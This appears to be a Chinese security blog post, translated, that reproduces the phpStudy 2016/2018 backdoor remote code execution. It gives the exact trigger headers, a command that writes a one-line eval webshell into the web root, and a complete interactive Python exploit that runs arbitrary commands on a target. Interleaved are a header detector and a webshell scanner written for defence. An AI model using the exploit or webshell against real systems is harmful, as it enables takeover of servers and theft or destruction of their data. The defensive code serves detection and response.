PhpStudy 2016-2018 RCE vulnerability reproduction

Vulnerability description

PHPStudy RCE (Remote Code Execution), also known as the phpstudy_backdoor vulnerability, is a remote code execution vulnerability in the PHPStudy software.

Vulnerability scope

phpStudy is a free integrated PHP development environment package that is popular in China. It bundles Apache, PHP, MySQL, phpMyAdmin and other software so that everything is installed in one step and can be used directly without configuration, setting up the environment with one click. The 2016 and 2018 versions of phpStudy contain an RCE vulnerability that was introduced when the distribution was maliciously tampered with by hackers; it allows system commands to be executed remotely.

The exact impact of a vulnerability depends on how an attacker exploits the vulnerability. By exploiting this vulnerability, an attacker could execute arbitrary PHP code and take complete control of the affected system. Attackers can execute malicious code, access and modify sensitive data, plant backdoors, and more.

Note that the vulnerability only affects systems running specific versions of PHPStudy, namely versions released between January 2018 and May 2019. The developer fixed it in the version released in May 2019.

Vulnerability number: phpstudy-2016,2018-RCE
Vulnerability name: RCE (Remote Command/Code Execution)
Vulnerability rating: High risk
Scope of impact: phpStudy 2016 to phpStudy 2018
Vulnerability description: Attackers can exploit this vulnerability to execute PHP code; it is also known as the phpStudy backdoor.

Vulnerability environment

Link: https://pan.baidu.com/s/1_kieJmU7Azq-lMKIp9VmaA
Extraction code: 2hf6

Vulnerability reproduction

The specific version and server platform are not listed here; refer to the phpinfo output.

Use Burp to capture the request and then resend it.


Triggering conditions

Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==
Accept-Encoding: gzip,deflate

Tip: pay attention to the spaces here; the header values must be written exactly as shown (no space after the comma in gzip,deflate).

Use the Burp encoder to build the system() command and base64-encode it,

which gives:

c3lzdGVtKCdpcGNvbmZpZycpOw==

After modifying the request, replay it; the response shown on the right confirms that ipconfig was executed.
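The trigger above is easy to recognise on the wire: a base64 Accept-Charset value that decodes to a PHP function call, paired with an Accept-Encoding of exactly gzip,deflate. The following detector is an added example (not from the original post or from phpStudy) that parses raw requests and classifies them; the sample requests are constructed, and the list of PHP function names it looks for is my own heuristic, not a list from the page.

```python
import base64
import binascii
import re

# Constructed sample requests (not captured traffic) in raw HTTP/1.1 form.
# The first one mirrors the trigger shown above; the others are near misses
# and ordinary browser traffic.
SAMPLE_REQUESTS = [
    "GET /phpinfo.php HTTP/1.1\r\nHost: 192.168.21.155\r\n"
    "Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==\r\nAccept-Encoding: gzip,deflate\r\n\r\n",
    # same payload but Accept-Encoding with a space: the backdoor condition is not met
    "GET /index.php HTTP/1.1\r\nHost: 192.168.21.155\r\n"
    "Accept-Charset: c3lzdGVtKCdpcGNvbmZpZycpOw==\r\nAccept-Encoding: gzip, deflate\r\n\r\n",
    # ordinary browser request
    "GET /index.php HTTP/1.1\r\nHost: 192.168.21.155\r\n"
    "Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\n\r\n",
    # no Accept-Charset at all
    "GET /index.php HTTP/1.1\r\nHost: 192.168.21.155\r\nAccept-Encoding: gzip,deflate\r\n\r\n",
]

# PHP execution primitives that never belong in a charset negotiation header
# (heuristic list chosen for this example).
PHP_CALL = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(", re.I
)


def parse_headers(raw_request):
    """Parse a raw HTTP request into a dict of lower-cased header name -> value."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def decode_charset(value):
    """Return the base64-decoded text of value, or None if it is not clean base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def classify(raw_request):
    """Return (verdict, decoded payload or None).

    'backdoor-trigger'  : PHP call in Accept-Charset and Accept-Encoding == gzip,deflate
    'suspicious-charset': PHP call in Accept-Charset but the encoding condition is not met
    'clean'             : anything else
    """
    headers = parse_headers(raw_request)
    decoded = decode_charset(headers.get("accept-charset", ""))
    if not decoded or not PHP_CALL.search(decoded):
        return "clean", None
    if headers.get("accept-encoding") == "gzip,deflate":
        return "backdoor-trigger", decoded
    return "suspicious-charset", decoded


def triage(raw_requests):
    """Return the (verdict, payload) pairs for every request that is not clean."""
    results = [classify(r) for r in raw_requests]
    return [r for r in results if r[0] != "clean"]


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(classify(raw))
```

Accept-Charset is not part of the default Apache or nginx combined log format, so to run this over real traffic the header has to be captured at a reverse proxy or IDS, or added to the server's LogFormat. The near-miss verdict is kept separate on purpose: a PHP call in Accept-Charset is worth an alert even when the backdoor would not fire.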


This command writes the string <?php @eval($_POST[cmd]); ?> to the file C:/phpStudy/WWW/shell.php. The resulting PHP file evaluates whatever is sent in the POST parameter cmd and returns the result. This is the classic one-line webshell. Please note that using such code is very dangerous, as it allows arbitrary command execution and manipulation of the server filesystem; it can easily be misused, for example to execute malicious commands or to destroy or steal data.

system('echo ^<?php @eval($_POST[cmd]); ?^>>"C:/phpStudy/WWW/shell.php"');
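Because the backdoor is typically used to drop exactly this kind of one-liner into the web root (C:/phpStudy/WWW by default, per the command above), a response step is to scan the web root for such files. The scanner below is an added example, not code from the original post or from phpStudy; the regular expressions are my own heuristics, and the sample web root it builds in a temporary directory is constructed for the demonstration.

```python
import os
import re
import tempfile

# Heuristic patterns for one-line webshells of the kind written above.
# Each entry is (label, compiled regex).
WEBSHELL_PATTERNS = [
    ("eval of request input",
     re.compile(r"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("command execution of request input",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("eval of decoded payload",
     re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
]

# Extensions the PHP handler will execute; other files are skipped.
PHP_EXTENSIONS = (".php", ".phtml", ".php5", ".phps", ".inc")


def scan_file(path):
    """Return the labels of all patterns matched in one file (empty list if clean)."""
    try:
        with open(path, "r", encoding="utf-8", errors="replace") as fh:
            content = fh.read()
    except OSError:
        return []
    return [label for label, rx in WEBSHELL_PATTERNS if rx.search(content)]


def scan_webroot(root):
    """Walk root and return sorted (relative path, [labels]) for every flagged PHP file."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(PHP_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, hits))
    return sorted(findings)


def make_sample_webroot():
    """Create a temporary web root populated with constructed files; returns its path."""
    root = tempfile.mkdtemp(prefix="www_")
    samples = {
        # the one-liner dropped by the command above
        "shell.php": "<?php @eval($_POST[cmd]); ?>",
        # a benign page
        "index.php": "<?php echo 'hello'; ?>",
        # an encoded variant in a subdirectory
        "upload/x.php": "<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>",
        # a non-PHP file that merely mentions the pattern; must not be flagged
        "readme.txt": "eval($_POST[cmd]) is dangerous",
    }
    for rel, body in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, hits in scan_webroot(make_sample_webroot()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it against the real web root with scan_webroot("C:/phpStudy/WWW"). Pattern matching only catches straightforward shells; comparing file hashes against a known-good deployment and checking recently modified files in the web root are the complementary checks to run alongside it.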

POC

POC is the abbreviation of "Proof of Concept". In the field of computer security, a POC usually refers to a specific demonstration or proof code written by attackers or security researchers to verify the existence, exploitability or attack method of a certain vulnerability.

Next I will demonstrate it. To show the effect more clearly, I will run it in PowerShell.

Running the RCE script with no arguments prints the banner below together with usage instructions.

When I add the website URL and run the script, I am prompted to enter the command I want to execute; pressing Enter runs it on the remote phpStudy host.

Below is the source code

import requests
import base64
import sys

banner = '''
.---. .-.          .--.  .-.          .-.        .---.  .--.  .--. 
: .; :: :         : .--'.' `.         : :        : .; :: .--': .--'
:  _.': `-. .---. `. `. `. .'.-..-. .-' :.-..-.  :   .': :   : `;  
: :   : .. :: .; ` _`, : : : : :; :' .; :: :; :  : :.`.: :__ : :__ 
:_;   :_;:_;: ._.'`.__.' :_; `.__.'`.__.'`._. ;  :_;:_;`.__.'`.__.'
            : :                           .-. :                    
            :_;                           `._.'                    
                python *.py http://192.168.21.155/phpinfo.php
'''

# Print the banner with usage and stop when no target URL is given
if len(sys.argv) < 2:
    print(banner)
    sys.exit()

url = sys.argv[1]

def attack(cmd):
    # Wrap the command in a PHP system() call and base64-encode it,
    # which is the form the backdoor reads from the Accept-Charset header
    cmd = f"system('{cmd}');"
    cmd = base64.b64encode(cmd.encode()).decode()

    headers = {
        "User-Agent"        : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0",
        "Accept-Charset"    : cmd,
        "Accept-Encoding"   : "gzip,deflate"   # must be exactly this value, no space
    }

    res = requests.get(url=url, headers=headers)
    # The command output is prepended to the normal page; decode as GB2312
    # (the default on Chinese Windows) and cut off at the start of the HTML
    rs = res.content.decode("gb2312", errors="replace")
    end = rs.find("DOCTYPE html")
    result = rs if end == -1 else rs[:end]
    return result

if __name__ == '__main__':
    # Prompt: "Enter the system command to execute:"; 'q' quits
    cmd = input("请输入想要执行的系统命令:")
    if cmd == 'q':
        print("感谢使用!!!")  # "Thanks for using!!!"
    else:
        print(attack(cmd))

Source: blog.csdn.net/qq_56698744/article/details/131730964